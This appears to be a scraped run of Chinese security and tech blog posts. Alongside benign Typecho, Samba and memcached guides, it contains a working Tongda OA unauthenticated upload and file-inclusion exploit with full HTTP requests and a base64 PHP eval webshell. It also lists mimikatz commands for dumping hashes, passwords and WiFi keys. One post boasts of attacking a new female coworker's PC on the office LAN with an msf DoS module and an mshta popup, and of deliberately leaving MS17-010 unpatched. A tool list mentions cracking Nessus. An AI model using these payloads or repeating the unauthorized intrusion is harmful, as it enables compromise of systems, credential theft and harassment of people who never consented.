src="https://code.jquery.com/jquery-3.4.1.min.js"></script>核心代码解读function addData(){ $.get('aip.php').done(function(data,status) 从api.php中获取数据 var data=eval('('+data+')'); //转换为json完整html代码index.html 使用将index.html和api.php放到你的根目录,修改数据库信息和字段信息。访问你的主机ip即可。
  18. typecho的seo优化,相对来说还是很不错的。但是我们的搜索引擎最喜欢爬取静态的页面,如hello.html而对于动态的页面效果肯定没有静态的好。typecho默认的网址路劲为https://xxx.com/index.php/archives/{cid}/本文教你怎样优化网址链接。 去掉index.php在网站根目录下新建文件.htaccess 写入内容如下: <IfModule mod_rewrite.c> Options +FollowSymLinks RewriteEngine on RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^(.*)$ /index.php/$1 [L] </IfModule>保存后,登录网站后台,永久链接设置 启用地址从写功能,并自定义网站网址路劲/{cid}.html 解决404问题如果你的网站是新站,或者百度收录比较少的话,这样就可以了。但是笔者的网站上线时间比较长,百度收录的也比较多。那么问题来了,百度收录的地址是https://blog.bbskali.cn/index.php/archives/22/而我现在的新地址是https://blog.bbskali.cn/22.html如果从百度访问站点直接404 解决方案: 在博客主题404写入下面文件 <?php $error_url = '//'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $id = strstr($error_url, 'index.php/archives'); //截取以posts开始的字符串 if($id != "" ||$id != null){//判断是否不等于空或者null $str = substr($id,18); $id2 = substr($str,-1); if($id2 != '/'){ header('HTTP/1.1 301 Moved Permanently'); //添加301状态码 header("location://".$_SERVER['HTTP_HOST'].$str.".html"); } elseif($id2 == '/'){ $nameid = substr($str,0,-1); header('HTTP/1.1 301 Moved Permanently'); //添加301状态码 header("location://".$_SERVER['HTTP_HOST'].$nameid.".html"); } } ?>这样便可以解决从百度搜索引擎访问404问题。但是靠301跳转并不是长久之计,还得要从搜索引擎入手。 网站改版登录百度站长平台-网站改版-添加改版规则 这里的网站改版规则很重要,填写规则让百度知道你的新网址和旧网址直接的规则关系。 利用sitemap(推荐小白使用) 利用sitemap我们获取全站的url然后新站和旧站的数据进行对比。 注意:中间用空格隔开,然后提交给百度。 自定义规则 首先来参考下百度给出的规则 旧文章页:https://blog.bbskali.cn/index.php/(\w+)/(\w+).html 新文章页:https://blog.bbskali.cn/${2}.html 对于规则,我也不是很确定这样写是否正确,如果你有好的建议可以下方留言哦。 修改好规则后,就是等待改版了
  19. 笔者的环境中有几台Linux的服务器,在上传文件的时候通常都是用ssh进行上传。但是文件上传比较慢,而且每次都需要登录ssh。就想着能不能用windows那样,方便快捷呢?Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件。 安装sudo apt-get install sambakali下已经默认安装,直接使用即可。 修改samba的配置文件sudo vi /etc/samba/smb.conf 添加下面内容 [share] path=/home/priess #文件共享的路劲 public=no #禁止匿名访问 writable=yes #写入权限 valid user=priess #登录用户名 注意登录的用户名必须为系统中存在的用户名,如root 给用户名添加密码sudo smbpasswd -a priess填坑 出现Failed to add entry for user 说明你的用户名在系统中不存在,需要添加一个用户名。 列出现有的Samba用户列表: pdbedit -w -L重启samba服务 service smbd restart和windows连接在windows->计算机,点击映射网络驱动器;输入\192.168.1.102\share(请根据自己的ip和共享文件夹标识调整)。此时,就可以在windows上看到linux共享的文件夹了。 访问网络磁盘
  20. 通达OA是由北京通达信科科技有限公司开发的一款办公系统,近日通达官方在其官网发布了安全提醒与更新程序,并披露有用户遭到攻击。 攻击者可在未授权的情况下可上传图片木马文件,之后通过精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击。 搭建本地环境通达OA下载: 链接:https://pan.baidu.com/s/1QFAoLxj9pD1bnnq3f4I8lg 提取码:ousi 包含漏洞的两个文件: 文件上传:webroot\ispirit\im\upload.php 文件包含:webroot\ispirit\interface\gateway.php 漏洞复现在没有登录的情况下上传文件 我们直接访问 http://localhost//ispirit/im/upload.php 提示:-ERR 用户未登陆 ok,我们在burp中构造数据包 POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.174.159:80 Content-Length: 602 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBwVAwV3O4sifyhr3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close ------WebKitFormBoundaryBwVAwV3O4sifyhr3 Content-Disposition: form-data; name="UPLOAD_MODE" 2 ------WebKitFormBoundaryBwVAwV3O4sifyhr3 Content-Disposition: form-data; name="P" ------WebKitFormBoundaryBwVAwV3O4sifyhr3 Content-Disposition: form-data; name="DEST_UID" 1 ------WebKitFormBoundaryBwVAwV3O4sifyhr3 Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" Content-Type: image/jpeg <?php $fp = fopen('bbskali.php', 'w'); $a = base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg=="); fwrite($fp, $a); fclose($fp); ?> ------WebKitFormBoundaryBwVAwV3O4sifyhr3--这里我构造了一个名为bbskali.php的图片一句话木马。但是上传之后格式为jpg格式。 如上图,我们成功上传图片。位置为2005/339702047.jpg 通达OA默认上传位置:myoa/attach/im则上面的完整路劲为:myoa/attach/im/2005/339702047.jpg 通过文件包含解析出一句话POST /ispirit/interface/gateway.php HTTP/1.1 Host: 192.168.123.209 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 59 json={"url":"/general/../../attach/im/2005/339702047.jpg"} 解析为php一句话
  21. 工欲其事必先利其器,在渗透测试中一份好的工具,是成功与否的关键所在。利用工具我们可以更加快捷的掌握系统中存在那些漏洞。从而完成一系列的渗透测试。 owaspOWASP是一个开源的、非盈利的全球性安全组织,致力于应用软件的安全研究。我们的使命是使应用软件更加安全,使企业和组织能够对应用安全风险做出更清晰的决策。目前OWASP全球拥有250个分部近7万名会员,共同推动了安全标准、安全测试工具、安全指导手册等应用安全技术的发展。 优点方便 简单 kali默认安装支持中文支持sql xxs 等常见的漏洞扫描结果支持导出 扫描速度快支持网站目录爬行niktoNikto是一款开源的(GPL)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件CGIs;超过625种服务器版本;超过230种特定服务器问题。 优点扫描速度快 支持网站目录爬行支持常见漏洞的扫描支持结果导出 WapitiWapiti 是另一个基于终端的 Web 漏洞扫描器,它发送 GET 和 POST 请求给目标站点,来寻找漏洞。 我们可以从终端窗口打开 Wapiti,例如: wapiti http://192.168.123.66/ -o wapiti_result -f html -m "-blindsql"我们会扫描 vulnerable_vm 中的 Peruggia 应用,将输出保存为 HTML 格式,保存到wapiti_result目录中,并跳过 SQL 盲注检测。 优点支持多种漏洞的扫描 效率更高支持模块化工具支持ssl攻击 nessusNessus 是目前全世界最多人使用的系统漏洞扫描与分析软件。总共有超过75,000个机构使用Nessus 作为扫描该机构电脑系统的软件。 优点扫描快速 寻找漏洞更加精确支持多种漏洞扫描和利用 缺点要钱!要钱!要钱! 当然,破解方法如下: nessus 破解安装 wpscan wpscan是针对wp程序的漏洞扫描工具,支持插件漏洞扫描,用户名枚举等骚操作。是居家旅行杀人放火之必备神器。 但是,只能针对wp程序,而其他程序则不行。 当然还有一些其他的工具,随着kali的更新已经弃用,比如vage个人感觉不错,但是在新版中已经挂掉。 结束语渗透千万条,安全第一条。 渗透不规范,亲人泪两行。???
  22. nikto是一款著名的web漏洞扫描神器,支持xss sql注入 web目录爬行 敏感目录 信息收集等常用的web漏洞的扫描和发现。 nikto基础使用扫描一个主机 nikto -h 192.168.123.66扫描指定端口 nikto -h 192.168.123.66 -p 80扫描保存结果 nikto -h 192.168.123.66 -p 80 -o bbskali.html 扫描结果 sql注入漏洞在后台登录页面发现sql注入漏洞,利用burp抓包,并进行sql注入。 burp抓包 利用sqlmap获取数据库
  23. 利用msf获得系统shell后,就完了? no~ 我们的渗透之路才刚刚开始。系统提权,权限维持,这些都是最基本的操作,除了这些还有那些好玩的呢? 获取明文密码如下,我们在msf中获得shell后,载入mimikatz模块load mimikatz 这里提示,需要载入kiwi我们再次载入 获取系统hash值 mimikatz_command -f samdump::hashes 参数说明: user:用户名 NTLM:hash值(如果获取明文失败,我们可以直接利用hashcat暴力破解) 获取密码明文 mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest 获取目标WiFi密码wifi_list_shared 获取扫雷的位置mimikatz_command -f winmine::infos
  24. 今天公司来了一位新女同事,此刻的我激动的不行。为了体现我的绅士风度,以及带有IT高手的标签的我。决定是时候表现正真的技术了。 温馨提示拿个镜子,好好看看,能不能满足下面条件。如果不能 一定要注意后果哦! 信息收集幸运的是HR将她安排到了我们同一个楼层。这就意味着和我在同一个局域网内。 作为IT专员对公司电脑的分布情况还是把握的。我们公司的电脑命名都是XXX公司-部门-序号排列的。 废话不说,神器nmap走一波 nmap -p0 192.168.123.1/24 ok,确定了目标。现在对目标进行漏洞扫描。 对于公司的电脑,漏洞我从来就没修复过。当然还有其他原因,这里我就不点明了。给个?自己体会。 针对存在的漏洞进行攻击 查看漏洞详细信息 拿出神器msf搜索漏洞模块 search MS11-030 use auxiliary/dos/windows/llmnr/ms11_030_dnsapi set RHOSTS 192.168.123.66 当然,像ms17_010这样的漏洞我是从来不修复的,就是方便后面…… 不以调戏为目标的渗透都不叫渗透进入shell命令下,执行下面命令: mshta vbscript:CreateObject("Wscript.Shell").popup("你好,新来的同事。有什么帮助可以找我哦!bbskali.cn",7,"来自一位绅士的温馨提示:",64)(window.close) 不以勾引为目标的渗透都不叫渗透作为一个宅男,不可能就这么调戏下就行了,手速快,口上也要灵活。通过各种灵活作为,成功走向人生的巅峰。
  25. memcached是一套分布式的高速缓存系统,由LiveJournal的Brad Fitzpatrick开发,但被许多网站使用。这是一套开放源代码软件,以BSD license授权发布。memcached缺乏认证以及安全管制,这代表应该将memcached服务器放置在防火墙后。 安装memcached分为服务器端和客户端 我们首先安装服务端 使用yum来安装memcached: yum install memcache*启动/usr/bin/memcached -d -l 127.0.0.1 -p 11211 -m 500 -u root参数说明:-d:守护进程。当从终端窗口退出的时候memcached还会继续运行 -l:指定ip地址,这里我们指定本地ip -p:指定端口号,端口号为11211 -m:分配内存,这里我分配了500M内存 -u:使用哪个用户运行memcached 客户端安装安装php-memcache 扩展 注意:笔者这里的PHP环境为7.1 wget https://github.com/websupport-sk/pecl-memcache/archive/NON_BLOCKING_IO_php7.zip unzip NON_BLOCKING_IO_php7.zip cd pecl-memcache-NON_BLOCKING_IO_php7/ /usr/local/Cellar/[email protected]/7.1.20/bin/phpize ./configure --enable-memcache --with-php-config=/usr/local/php71/bin/php-config make make install配置php.ini 在文档后添加extension = memcache.so即可!